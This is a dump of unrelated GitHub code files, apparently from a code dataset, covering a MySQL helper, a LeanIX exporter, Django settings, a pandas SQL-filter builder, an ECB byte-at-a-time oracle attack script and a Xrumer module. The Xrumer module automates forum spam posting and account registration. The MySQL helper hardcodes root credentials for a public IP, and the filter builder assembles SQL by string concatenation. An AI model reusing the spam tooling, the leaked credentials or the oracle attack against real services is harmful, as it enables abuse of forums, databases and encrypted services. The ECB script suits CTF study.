utc_dt.replace(tzinfo=pytz.utc).astimezone(local_tz)\n time_str = local_dt.strftime(local_format)\n return time_str\n\ndef insert(sql):\n # 打开数据库连接\n db = pymysql.connect(host=\"118.190.175.23\", port=3306, user='root',password=\"2MbANhiG0w623rEw\", db=\"blockfuture\", charset='utf8mb4')\n\n # 使用cursor()方法获取操作游标\n cursor = db.cursor()\n\n # 执行sql语句\n cursor.execute(sql)\n # 提交到数据库执行\n db.commit()\n print('insert successful')\n\n # 关闭数据库连接\n db.close()\n\ndef query(sql):\n # 打开数据库连接\n db = pymysql.connect(host=\"118.190.175.23\", port=3306, user='root',password=\"2MbANhiG0w623rEw\", db=\"blockfuture\")\n try:\n with db.cursor() as cursor:\n count = cursor.execute(sql) # 影响的行数\n result = cursor.fetchall() # 取出所有行\n db.commit() # 提交事务\n return result\n except:\n db.rollback() # 若出错了,则回滚\n\n finally:\n db.close()\n\ndef get_type(list,coin_id):\n n = 1\n myid = coin_id.split('&')[-1]\n sort_list = sorted(list, key=itemgetter('stargazers_count'), reverse=True)\n for i in sort_list:\n i['type'] = n\n i['coin_id'] = myid\n n = n+1\n return sort_list\n\ndef str_to_int(str):\n s =str.split(',')\n int2 = ''\n for i in s:\n int2 += i\n\n return int(int2)\n\nif __name__ == '__main__':\n print(len(query('select coin_id from coin_people where coin_name = \"BOScoin\"') ) )\n\n\n","repo_name":"lijielife/github_coin","sub_path":"read_url.py","file_name":"read_url.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"33898775928","text":"#!/usr/bin/env python\n\nimport csv, glob, os\n\n#Seperate files into types\nA = []\nB = []\nC = []\nother = []\n\nos.chdir(\"ShortDiscounting\")\nfor file in glob.glob(\"*.csv\"):\n with open(file, 'r') as f:\n wordlist = [line.split()[0] for line in f]\n if (len(wordlist[0]) == 34):\n A.append(file)\n elif (len(wordlist[0]) == 91):\n B.append(file)\n elif (len(wordlist[0]) == 1):\n C.append(file)\n else:\n other.append(file)\n\n#Create dictionaries of file names and their date\nAdate = {}\nfor files in A:\n with open(files, 'rb') as f:\n datecol = [line.split(\",\")[1] for line in f]\n date = datecol[0].replace('-', '/')\n Adate[files] = date\nBdate= {}\nfor files in B:\n with open(files, 'rb') as f:\n datecol = [line.split(\",\")[0] for line in f]\n parsedStr = datecol[1].split(\" \")[1]\n date = parsedStr.replace('-', '/')\n Bdate[files] = date\n\n#Create reference dictionary\nwith open('eprime_dates_addtl_JP.csv', 'rb') as f:\n reader = csv.reader(f)\n IDs = {}\n next(reader)\n for row in reader:\n IDs.setdefault(row[0], []).append(row[3])\n IDs.setdefault(row[1], []).append(row[3])\n if row[2] == \"\":\n continue\n else:\n IDs.setdefault(row[2], []).append(row[3])\n#Correct date formatting\nfor key, value in IDs.iteritems():\n for date in value:\n parsed = date.split(\"/\")\n if (parsed[0][0] == \" \"):\n parsed[0] = parsed[0].replace(' ', '')\n if (len(parsed[0]) == 1):\n parsed[0] = \"0\" + parsed[0]\n if (len(parsed[1]) == 1):\n parsed[1] = \"0\" + parsed[1]\n date = \"/\".join(parsed)\n IDs[key] = date\n\n\n#Check if matched\nfor key in IDs:\n for files in Adate:\n underscoredFiles = files.replace('_', '-')\n if key in underscoredFiles:\n if Adate[files] == IDs[key]:\n print (underscoredFiles, key, Adate[files], IDs[key])\n for files in Bdate:\n underscoredFiles = files.replace('_', '-')\n if key in underscoredFiles:\n if Bdate[files] == IDs[key]:\n print (files, key, Bdate[files], IDs[key])\n\n\n\n","repo_name":"perronea/matchShortDiscounting","sub_path":"match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"14902991347","text":"# This Script can be used to export the relationships between two FactSheets along with the attributes on the relation.\n# In this example we are looking at Application to ITC Relationship and Attribute on Relationship : technicalSuitability or Technical Fit.\n# This script will export the fields, Application,ITC, Application to ITC Relationship and also the attribute technicalSuitability\n# Output of this script is a file : Info.csv can be used as an input in importRelationship.py after making the relvant changes.\n# Changes required in the Script :-\n# 1. Adapt mtm_base_url as per your instance. Eg. us-svc,eu-svc\n# 2. Adapt pathfinder_base_url and apiToken\n# 3. Modify the query in getRelationVariablesToExport and include the attributes as per requirement.\n# 4. Also modify the CSV writer and newObject to include your attributes.\n\nimport json \nimport requests \nimport pandas as pd\nimport base64\nimport time\nimport csv\nimport datetime\n\n# 1. Adapt mtm_base_url as per your instance. Eg. us-svc,eu-svc\nmtm_base_url = 'https://eu-svc.leanix.net/services/mtm/v1'\n# 2. Adapt pathfinder_base_url\npathfinder_base_url = 'https://demo-eu.leanix.net/services/pathfinder/v1'\napiToken = \"\"\n\ndef getAccessToken(api_token):\n #different than callPost since it needs to send the auth_header\n response = requests.post(mtm_base_url+\"/oauth2/token\", auth=('apitoken', api_token),\n data={'grant_type': 'client_credentials'})\n response.raise_for_status() \n access_token = response.json()['access_token']\n return access_token\n\n\n\ndef getHeader(access_token):\n return {'Authorization': 'Bearer ' + access_token, 'Content-Type': 'application/json'}\n\n# Function to decipher the access_token\ndef getAccessTokenJson(access_token):\n payload_part = access_token.split('.')[1]\n # fix missing padding for this base64 encoded string.\n # If number of bytes is not dividable by 4, append '=' until it is.\n missing_padding = len(payload_part) % 4\n if missing_padding != 0:\n payload_part += '='* (4 - missing_padding)\n payload = json.loads(base64.b64decode(payload_part))\n return payload\n\ndef callPost(request_url, header, data):\n try:\n response = requests.post(url=request_url, headers=header, data=json.dumps(data))\n response.raise_for_status()\n except requests.exceptions.HTTPError as err:\n print(request_url)\n print(json.dumps(data))\n print(err)\n exit\n return response.json()\n\n\n\ndef updateHost(host):\n global pathfinder_base_url\n pathfinder_base_url = 'https://%s/services/pathfinder/v1'%(host)\n\ndef getApiToken():\n with open('../access.json') as json_file: \n data = json.load(json_file)\n# if (data[\"host\"] is not None):\n# updateHost(data[\"host\"])\n return data['apiTokenExportRelations']\n\ndef postGraphQl(query, access_token):\n response = callPost(pathfinder_base_url+'/graphql', getHeader(access_token), query)\n return response\n\n\n\ndef getRelationVariablesToExport():\n query = \"\"\"\n {\n allFactSheets(factSheetType: Application){\n totalCount\n edges{\n node{\n id\n displayName\n tags{\n id\n name\n }\n ... on Application{\n relApplicationToITComponent{\n edges{\n node{\n id\n factSheet{\n displayName\n id\n }\n technicalSuitability\n }\n }\n }\n }\n }\n }\n\n }\n }\n\n \"\"\"\n return {\"query\": query}\n\ndef getSingleFactsheet():\n query = \"\"\"{ \n factSheet(id:\"28fe4aa2-6e46-41a1-a131-72afb3acf256\") {\n id\n displayName\n ... on Application{\n relApplicationToUserGroup{\n edges{\n node{\n id\n activeFrom\n activeUntil\n }\n }\n }\n }\n }\n}\n\"\"\"\n return {\"query\": query}\n\n\n\ndef getGraphQl(query, access_token):\n response = callPost(pathfinder_base_url+'/graphql', getHeader(access_token), query)\n return response\n\n\naccess_token = getAccessToken(apiToken)\naccess_token_json = getAccessTokenJson(access_token)\n\n\n## notice the Dictionary Call ['data'] at the end ofhe function call.\ndata = getGraphQl(getRelationVariablesToExport(), access_token)['data']\n\n#print(json.dumps(data,indent=2))\n\nwith open('Info.csv', 'w') as csvfile:\n #writer = csv.writer(csvfile, delimiter=';') #For German Locale, we need another delimiter\n writer = csv.writer(csvfile, delimiter=';')\n writer.writerow(['Application','App ID', 'ITComponent', 'ITComponent ID','Relation ID', 'Tags','Attribute Value'])\n\n for fsnode in data['allFactSheets']['edges']:\n fs = fsnode['node']\n tags = fs['tags']\n tagCots = ''\n for tag in tags:\n if tag['name'] == 'COTS Package':\n tagCots = 'COTS Package'\n if tag['name'] == 'No COTS Package':\n tagCots = 'No COTS Package'\n for dateNode in fs['relApplicationToITComponent']['edges']:\n newObject = {\n \"application\":fs['displayName'],\n \"appId\":fs['id'],\n \"relationId\":dateNode['node']['id'],\n \"itcName\":dateNode['node']['factSheet']['displayName'],\n \"itcId\":dateNode['node']['factSheet']['id'],\n \"attributeValue\":dateNode['node']['technicalSuitability'],\n \"tagCots\":tagCots\n }\n writer.writerow([newObject['application'],newObject['appId'],newObject['itcName'],newObject['itcId'],newObject['relationId'],newObject['tagCots'],newObject['attributeValue']])","repo_name":"leanix-public/scripts","sub_path":"modifyAttributesOnRelations/exportRelationship.py","file_name":"exportRelationship.py","file_ext":"py","file_size_in_byte":5646,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"50"} +{"seq_id":"38041475575","text":"from pathlib import Path\nfrom envparse import env\n\nBASE_DIR = Path(__file__).resolve().parent.parent\n\nENV_FILE_PATH = BASE_DIR.joinpath('.env')\n\nif ENV_FILE_PATH.is_file():\n env.read_envfile(path=ENV_FILE_PATH)\n\nSECRET_KEY = env.str('SECRET_KEY')\n\nDEBUG = env.bool('DEBUG', default=False)\n\nALLOWED_HOSTS = ['*']\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'rest_framework',\n 'django_filters',\n 'social_django',\n 'core',\n 'goals',\n 'bot',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'social_django.middleware.SocialAuthExceptionMiddleware',\n]\n\nROOT_URLCONF = 'todolist.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'todolist.wsgi.application'\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': env.str('DB_NAME'),\n 'USER': env.str('DB_USER'),\n 'PASSWORD': env('DB_PASSWORD'),\n 'HOST': env.str('DB_HOST', default='127.0.0.1'),\n 'PORT': 5432,\n }\n}\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n 'OPTIONS': {\n 'min_length': 8,\n }\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_TZ = True\n\nSTATIC_URL = 'static/'\nSTATIC_ROOT = BASE_DIR.joinpath('static')\n\nAUTH_USER_MODEL = 'core.User'\n\nLOGGING = {\n 'disable_existing_loggers': False,\n 'version': 1,\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'level': 'DEBUG',\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n 'propagate': False,\n },\n 'django.db': {\n 'level': 'DEBUG',\n },\n },\n}\n\nDEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'\n\n# Social Oauth\nSOCIAL_AUTH_JSONFIELD_ENABLED = True\nSOCIAL_AUTH_JSONFIELD_CUSTOM = 'django.db.models.JSONField'\nSOCIAL_AUTH_VK_OAUTH2_KEY = env.str('VK_OAUTH2_KEY')\nSOCIAL_AUTH_VK_OAUTH2_SECRET = env.str('VK_OAUTH2_SECRET')\nAUTHENTICATION_BACKENDS = (\n 'social_core.backends.vk.VKOAuth2',\n 'django.contrib.auth.backends.ModelBackend',\n)\nSOCIAL_AUTH_URL_NAMESPACE = 'social'\nSOCIAL_AUTH_LOGIN_REDIRECT_URL = '/'\nSOCIAL_AUTH_LOGIN_ERROR_URL = '/login-error/'\nSOCIAL_AUTH_VK_OAUTH2_SCOPE = ['email']\nSOCIAL_AUTH_VK_EXTRA_DATA = [\n ('email', 'email'),\n]\nSOCIAL_AUTH_NEW_USER_REDIRECT_URL = '/logged-in/'\nSOCIAL_AUTH_USER_MODEL = 'core.User'\n\nREST_FRAMEWORK = {\n 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',\n 'DATETIME_FORMAT': '%Y-%m-%d %H:%M:%S',\n}\n\nTG_TOKEN = env.str('TG_TOKEN')\n","repo_name":"VladimirVlasov1982/todolist","sub_path":"todolist/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"31380096729","text":"import pandas as pd\n\noracle_operators = {\n '==': '=', '!=': '!=', 'LIKE': 'LIKE',\n 'IN': 'IN', 'BETWEEN': 'BETWEEN', '>=': '>=',\n '<=': '<=', 'NOT IN': 'NOT IN', '>': '>', '<': '<'\n}\nsql_server_operators = {\n '==': '=', '!=': '!=', 'LIKE': 'LIKE',\n 'IN': 'IN', 'BETWEEN': 'BETWEEN', '>=': '>=',\n '<=': '<=', 'NOT IN': 'NOT IN', '>': '>', '<': '<'\n}\n\n\ndef get_operators(column):\n operators = {\n '==': [], '!=': [], 'LIKE': [],\n 'IN': [], 'BETWEEN': [], '>=': [],\n '<=': [], 'NOT IN': [], '>': [], '<': []\n }\n # get the params\n for my_filter in column['filtros']:\n if int(my_filter['tipo_valor']) == 2:\n my_filter['valor_filtro'] = f\"\\'{my_filter['valor_filtro']}\\'\"\n operators[my_filter['operador']].append(my_filter['valor_filtro'])\n\n if len(operators['==']) > 1 or (len(operators['==']) >= 1 and len(operators['IN']) >= 1):\n operators['IN'] = operators['IN'] + operators['==']\n operators['=='] = []\n if len(operators['!=']) > 1 or (len(operators['!=']) >= 1 and len(operators['NOT IN']) >= 1):\n operators['NOT IN'] = operators['NOT IN'] + operators['!=']\n operators['!='] = []\n\n return operators\n\n\ndef get_where(columns, sql_source):\n where = ''\n current_operators = {}\n if sql_source == 1: # SQL SERVER\n current_operators = sql_server_operators\n else:\n current_operators = oracle_operators\n\n for column in columns:\n operators = get_operators(column)\n for operator in operators:\n # IN - NOT IN\n if (operator == 'IN' and len(operators[operator]) > 0) or (\n operator == 'NOT IN' and len(operators[operator]) > 0):\n in_field = f\"{column['mapeo']} {current_operators[operator]} (\"\n for value in operators[operator]:\n in_field += str(value) + ', '\n in_field = in_field[:len(in_field) - 2] + ') AND '\n where += in_field\n # BETWEEN\n elif operator == 'BETWEEN':\n for value in operators[operator]:\n val1, val2 = value[1:len(value) - 1].split('|') # remove quotes and split\n val1 = f'\\'{val1}\\''\n val2 = f'\\'{val2}\\''\n where += column['mapeo'] + ' ' + current_operators[operator] + ' ' + str(val1) + ' AND ' \\\n + str(val2) + ' AND '\n else:\n for value in operators[operator]:\n where += column['mapeo'] + ' ' + current_operators[operator] + ' ' + str(value) + ' AND '\n where = where[:len(where) - 5]\n return where\n\n\ndef get_filter_query(columns, table='', sql_source=1):\n\n if sql_source ==1:\n\n query = 'SELECT '\n if len(columns) == 0:\n query += '* '\n for column in columns:\n query += column['mapeo'] + ', '\n query = query[:len(query) - 2] + f\", ROW_NUMBER() OVER(ORDER BY {columns[0]['mapeo']}) AS indice FROM {table} WHERE \"\n query += get_where(columns, sql_source)\n if query[len(query) - 6:] == 'WHERE ': # check no filters\n query = query[:len(query) - 6]\n\n\n if sql_source == 2:\n\n query = 'SELECT '\n if len(columns) == 0:\n query += '* '\n for column in columns:\n query += column['mapeo'] + ', '\n query = query[:len(query) - 2] + f', ROWNUM indice FROM {table} WHERE '\n query += get_where(columns, sql_source)\n if query[len(query) - 6:] == 'WHERE ': # check no filters\n query = query[:len(query) - 6]\n return query\n\n\ndef apply_filter_to_dataframe(dataframe, columns):\n no_arithmetic = {'LIKE': like_to_pandas, 'IN': in_to_pandas, 'BETWEEN': between_to_pandas,\n 'NOT IN': not_in_to_pandas}\n filters_to_process = {}\n for column in columns:\n filters_to_process[column['mapeo']] = get_operators(column)\n # First apply arithmetic operators\n dataframe = arithmetic_to_pandas(dataframe, filters_to_process)\n for operator in no_arithmetic:\n if operator == 'BETWEEN':\n dataframe = no_arithmetic[operator](dataframe, filters_to_process, columns)\n else:\n dataframe = no_arithmetic[operator](dataframe, filters_to_process)\n\n if dataframe.shape[0] == 0:\n raise (\"error filtro\")\n return dataframe\n\n\ndef arithmetic_to_pandas(dataframe, values):\n not_arithmetic = ['LIKE', 'IN', 'BETWEEN', 'NOT IN']\n for value in values:\n for operator in values[value]:\n if operator not in not_arithmetic:\n for filter_value in values[value][operator]:\n dataframe = dataframe.query(f\"{value} {operator} {filter_value} \")\n return dataframe\n\n\ndef like_to_pandas(dataframe, values):\n for value in values:\n for filter_value in values[value]['LIKE']:\n dataframe = dataframe.query(f\"{value}.str.contains({filter_value})\", engine='python')\n return dataframe\n\n\ndef in_to_pandas(dataframe, values):\n for value in values:\n # pass\n if len(values[value]['IN']) > 0:\n dataframe = dataframe[dataframe[value].isin(values[value]['IN'])]\n return dataframe\n\n\ndef not_in_to_pandas(dataframe, values):\n for value in values:\n # pass\n if len(values[value]['NOT IN']) > 0:\n dataframe = dataframe[~dataframe[value].isin(values[value]['NOT IN'])]\n return dataframe\n\n\ndef between_to_pandas(dataframe, values, data):\n for value in values:\n if len(values[value]['BETWEEN']) > 0:\n my_type = 1\n for dat in data:\n if dat['mapeo'] == value:\n my_type = dat['tipo']\n val1, val2 = values[value]['BETWEEN'][0].split('|') # remove quotes and split\n val1, val2 = val1[1:], val2[:len(val2) - 1]\n # check types\n\n if my_type == 1:\n try:\n val1, val2 = int(val1), int(val2)\n except:\n\n return dataframe\n elif my_type == 4:\n try:\n val1, val2 = float(val1), float(val2)\n except:\n\n return dataframe\n dataframe = dataframe[(dataframe[value] >= val1) & (dataframe[value] <= val2)]\n\n return dataframe\n\n\nif __name__ == '__main__':\n cols = [\n {\n \"mapeo\": \"ID_ANIOMES\",\n \"tipo\": 2,\n \"filtros\":\n [\n {\n \"operador\": \"IN\",\n \"tipo_valor\": 1,\n \"valor_filtro\": \"201508\"\n },\n {\n \"operador\": \"BETWEEN\",\n \"tipo_valor\": 2,\n \"valor_filtro\": \"201508|201509\"\n }\n\n ]\n },\n {\n \"mapeo\": \"ID_CLIPADRE\",\n \"tipo\": 1,\n \"filtros\":\n [\n {\n \"operador\": \"<=\",\n \"tipo_valor\": 1,\n \"valor_filtro\": \"9276\"\n }\n ]\n },\n {\n \"mapeo\": \"ID_MARCA_PADRE\",\n \"tipo\": 2,\n \"filtros\":\n [\n ]\n },\n {\n \"mapeo\": \"INDICE\",\n \"tipo\": 2,\n \"filtros\":\n [\n {\n \"operador\": \"!=\",\n \"tipo_valor\": 1,\n \"valor_filtro\": \"6000002\"\n }\n ]\n },\n {\n \"mapeo\": \"ID_SUBMERCADO\",\n \"tipo\": 2,\n \"filtros\":\n [\n {\n \"operador\": \"LIKE\",\n \"tipo_valor\": 2,\n \"valor_filtro\": \"07R\"\n }\n ]\n }\n ]\n\n columns = []\n for col in cols:\n columns.append(col['mapeo'])\n\n file = pd.read_csv('../../media/1/input/resultado104.csv', usecols=columns)\n\n apply_filter_to_dataframe(file, cols)\n","repo_name":"juansuv/as","sub_path":"app/normaliza/extra/api_filters.py","file_name":"api_filters.py","file_ext":"py","file_size_in_byte":8187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"41669580678","text":"import matplotlib.pyplot as plt\n\n\ndef autolabel(rects, ax, xpos=\"center\", p=6):\n \"\"\"\n Attach a text label above each bar in *rects*, displaying its height.\n *xpos* indicates which side to place the text w.r.t. the center of\n the bar. It can be one of the following {'center', 'right', 'left'}.\n \"\"\"\n ha = {\"center\": \"center\", \"right\": \"left\", \"left\": \"right\"}\n offset = {\"center\": 0, \"right\": 1, \"left\": -1}\n\n for rect in rects:\n height = rect.get_height()\n height = round(height, p)\n ax.annotate(\n \"{}\".format(height),\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(offset[xpos] * 3, 3), # use 3 points offset\n textcoords=\"offset points\", # in both directions\n ha=ha[xpos],\n va=\"bottom\",\n )\n\n\ndef draw_R_style1(lines):\n plt.legend(lines, [l.get_label() for l in lines])\n plt.gcf().canvas.set_window_title(\"Comparison\")\n plt.xlabel(\"Wave Length\")\n plt.ylabel(\"R\")\n plt.gcf().set_size_inches(8, 8)\n plt.ylim(0, 1)\n plt.show()\n","repo_name":"mohammadsa9/ColorMatching","sub_path":"Example 4/libraries/MyPlot.py","file_name":"MyPlot.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"4677682650","text":"import string\nimport requests\nimport time\n\n# Change as per need\nnum_bytes_to_recover = 10\n\ndef encrypt(payload):\n url = \"???\"\n r = requests.get(\"url + payload usually\") \n return r.json()['ciphertext'] # or wtv the way to get CT is\n\ndef brute_force():\n flag = \"\"\n bits_to_recover = num_bytes_to_recover * 8 - 1 # 0-indexed\n alphabets = '_'+'@'+'}'+\"{\"+string.digits+string.ascii_lowercase+string.ascii_uppercase\n \n while(True):\n payload = 'a' * (bits_to_recover - len(flag))\n target = encrypt(payload.encode().hex())\n print(\"Exp\", ' ', end=\"\")\n \n for a in alphabets:\n trial = encrypt((payload + flag + a).encode().hex()) \n print(a, \" \", end = '')\n\n block_start = 8 * num_bytes_to_recover\n if(trial[block_start:block_start*2] == target[block_start:block_start*2]):\n flag += a \n print(flag)\n break \n \n # Ensure that the server is not blocking us\n time.sleep(0.5)\n \n # Change as per need, usually flag ends with } \n if flag.endswith(\"}\"):\n print(flag)\n break \n \nif __name__== \"__main__\":\n brute_force() ","repo_name":"SnickeyX/CryptoScripts","sub_path":"symmetric/ecb_oracle.py","file_name":"ecb_oracle.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"25589113069","text":"# coding=utf8\nimport os, shutil, codecs, random, string, kwk8, baseparser, basechecker\nfrom xml.sax.saxutils import escape\nfrom xrumerxdf import *\n\n'''Классы XrumerHelperBaseSpam и XrumerHelperBaseDoors не протестированы на \nработу с предварительной регистрацией.'''\n\nclass XrumerHelper(object):\n '''Абстрактный предок хэлперов'''\n \n def __init__(self, agent):\n self.agent = agent\n self.currentTask = self.agent.currentTask\n self.linker = XrumerTopicLinker(self)\n self.creationType = self.currentTask['creationType']\n self.registerRun = self.currentTask['registerRun']\n snippetsFolder = os.path.dirname(os.path.abspath(__file__)) + '/snippets'\n keywordsFolder = os.path.join(self.agent.appFolder, 'Keywords')\n self.keywordsFile = os.path.join(keywordsFolder, '%s.txt' % self.currentTask['niche'])\n self.keywordsFileEsc = escape(self.keywordsFile)\n self.snippetsFileEsc = escape(os.path.join(snippetsFolder, self.currentTask['snippetsFile']))\n self.anchorsFileEsc = escape(self.linker.GetSpamAnchorsFile())\n self.profilesFileEsc = escape(self.linker.GetProfilesFile())\n self.randomizeNames = False\n \n def _WriteKeywords(self):\n '''Пишем кейворды'''\n with codecs.open(self.keywordsFile, 'w', 'cp1251') as fd:\n fd.write('\\n'.join(self.currentTask['keywordsList']))\n \n def _CopyBase(self, sourceFileName, destFileName):\n '''Копируем базу'''\n try:\n shutil.copyfile(sourceFileName, destFileName)\n except Exception as error:\n print('Cannot copy base: %s' % error)\n \n def _DeleteBase(self, baseFileName):\n '''Удаляем базу'''\n if os.path.isfile(baseFileName): \n try:\n os.remove(baseFileName)\n except Exception as error:\n print('Cannot remove base: %s' % error)\n \n def _FilterBase(self, baseFileName):\n '''Фильтруем базу от неуспешных и считаем число ссылок'''\n try:\n if kwk8.Kwk8Links(self.agent.logFails).Count() > 700:\n kwk8.Kwk8Links(baseFileName).DeleteByFile(self.agent.logFails).Save(baseFileName)\n except Exception as error:\n print('Cannot filter base: %s' % error)\n self.agent._CountLinks('baseLinksCount', baseFileName, 'base')\n \n def GetProjectName(self):\n '''Имя проекта'''\n return 'ProjectX%d' % self.currentTask['id']\n \n def ActionOn(self):\n '''Действия при старте'''\n pass\n \n def ActionOff(self):\n '''Действия при финише'''\n pass\n\nclass XrumerHelperBaseRaw(XrumerHelper):\n '''Парсим и чекаем новую базу'''\n \n def GetProjectName(self):\n return 'ProjectN%d' % self.currentTask['id']\n \n def ActionOn(self):\n '''Парсим базу'''\n parseTimeout = 90 * 60\n if 'parseTimeout' in self.currentTask:\n parseTimeout = int(self.currentTask['parseTimeout']) * 60\n startTopics = self.currentTask['parseParams']\n baseparser.Parse(self.agent.appFolder, startTopics, parseTimeout, self.currentTask['baseNumberMain'])\n '''Содержимое проекта'''\n randomToken = ''.join(random.choice(string.letters) for _ in xrange(10))\n projSubject = '#file_links[%s,1,N]' % (self.keywordsFileEsc)\n projBody = '#file_links[%s,10,S] %s #file_links[%s,3,S] #file_links[%s,3,S] #file_links[%s,10,S]' % (self.snippetsFileEsc, randomToken, self.anchorsFileEsc, self.profilesFileEsc, self.snippetsFileEsc)\n '''Пишем кейворды и удаляем старые базы'''\n self._WriteKeywords()\n self._DeleteBase(self.agent.baseMainRFile)\n self._DeleteBase(self.agent.baseMainZFile)\n self._DeleteBase(self.agent.baseMainEFile)\n '''Создаем настройки'''\n threadsCount = 110\n self.agent._CreateSettings('none', '', 'post', 'LinksList', threadsCount, projSubject, projBody)\n \n def ActionOff(self):\n '''Проверяем базу'''\n basechecker.Check(self.agent.appFolder, self.agent.projectName, self.currentTask['baseNumberMain'])\n '''Считаем число ссылок'''\n self.agent._CountLinks('baseLinksCount', self.agent.baseMainFile, 'base')\n \nclass XrumerHelperBaseSpam(XrumerHelper):\n '''Базы L, R и Z для спама по топикам'''\n \n def GetProjectName(self):\n return 'ProjectR%d' % self.currentTask['id']\n \n def ActionOn(self):\n '''Содержимое проекта'''\n spamLinksList = escape(codecs.decode(' '.join(self.currentTask['spamLinksList']), 'cp1251'))\n projSubject = '#file_links[%s,1,N]' % (self.keywordsFileEsc)\n projBody = '#file_links[%s,10,S] %s #file_links[%s,3,S] #file_links[%s,3,S] #file_links[%s,10,S]' % (self.snippetsFileEsc, spamLinksList, self.anchorsFileEsc, self.profilesFileEsc, self.snippetsFileEsc)\n '''Пишем кейворды, копируем исходную базу в целевую и удаляем существующую базу R или Z'''\n self._WriteKeywords()\n self._CopyBase(self.agent.baseSourceFile, self.agent.baseMainFile)\n if self.currentTask['baseType'] == 'RLinksList':\n self._DeleteBase(self.agent.baseMainRFile)\n elif self.currentTask['baseType'] == 'ZLinksList': \n self._DeleteBase(self.agent.baseMainZFile)\n else:\n pass \n '''Создаем настройки'''\n threadsCount = 110\n if self.creationType == 'post':\n self.agent._CreateSettings('none', '', 'post', 'LinksList', threadsCount, projSubject, projBody)\n elif self.creationType == 'reply':\n self.agent._CreateSettings('none', '', 'reply', 'LinksList', threadsCount, projSubject, projBody)\n elif self.creationType == 'reg + post' and self.registerRun:\n self.agent._CreateSettings('register-only', '', 'post', 'LinksList', threadsCount, projSubject, projBody)\n elif self.creationType == 'reg + post' and not self.registerRun:\n self.agent._CreateSettings('from-registered', '', 'post', 'LinksList', threadsCount, projSubject, projBody)\n elif self.creationType == 'reg + reply' and self.registerRun:\n self.agent._CreateSettings('register-only', '', 'reply', 'LinksList', threadsCount, projSubject, projBody)\n elif self.creationType == 'reg + reply' and not self.registerRun:\n self.agent._CreateSettings('from-registered', '', 'reply', 'LinksList', threadsCount, projSubject, projBody)\n \n def ActionOff(self):\n '''Копируем анкоры и удаляем базу, которую копировали ранее'''\n self.linker.AddSpamAnchorsFile()\n if self.currentTask['baseType'] == 'RLinksList':\n self._FilterBase(self.agent.baseMainRFile)\n self._DeleteBase(self.agent.baseMainFile) \n elif self.currentTask['baseType'] == 'ZLinksList':\n self._FilterBase(self.agent.baseMainZFile)\n self._DeleteBase(self.agent.baseMainFile) \n else:\n pass\n\nclass XrumerHelperSpamTask(XrumerHelper):\n '''Задание для спама по базам L, R и Z'''\n \n def __init__(self, agent):\n '''Обработка параметров агента'''\n if 'baseZ' in agent.currentTask:\n agent.currentTask['baseType'] = 'ZLinksList'\n agent.currentTask['baseNumberMain'] = int(agent.currentTask['baseZ'])\n if 'baseL' in agent.currentTask:\n agent.currentTask['baseType'] = 'LinksList'\n agent.currentTask['baseNumberMain'] = int(agent.currentTask['baseL'])\n if 'randomizeNames' in agent.currentTask:\n self.randomizeNames = True\n super(XrumerHelperSpamTask, self).__init__(agent)\n \n def GetProjectName(self):\n return 'ProjectS%d' % self.currentTask['id']\n \n def ActionOn(self):\n '''Содержимое проекта'''\n spamLinksList = escape(codecs.decode(' '.join(self.currentTask['spamLinksList']), 'cp1251'))\n projSubject = '#file_links[%s,1,N]' % (self.keywordsFileEsc)\n projBody = '#file_links[%s,10,S] %s #file_links[%s,3,S] #file_links[%s,3,S] #file_links[%s,10,S]' % (self.snippetsFileEsc, spamLinksList, self.anchorsFileEsc, self.profilesFileEsc, self.snippetsFileEsc)\n '''Пишем кейворды'''\n self._WriteKeywords()\n '''Создаем настройки'''\n if self.currentTask['baseType'] == 'RLinksList':\n self.agent._CreateSettings('from-registered', '', 'reply', 'RLinksList', 160, projSubject, projBody)\n elif self.currentTask['baseType'] == 'ZLinksList':\n self.agent._CreateSettings('none', '', 